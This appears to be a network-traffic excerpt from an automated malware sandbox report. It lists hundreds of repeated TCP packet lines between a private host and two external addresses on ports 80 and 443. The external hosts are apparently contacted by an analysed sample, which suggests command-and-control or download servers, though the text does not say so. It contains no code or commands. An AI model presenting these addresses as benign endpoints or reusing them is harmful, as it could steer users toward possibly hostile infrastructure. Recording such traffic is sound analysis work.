                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49169
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49170
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49171
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49172
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 38.240.44.9:80
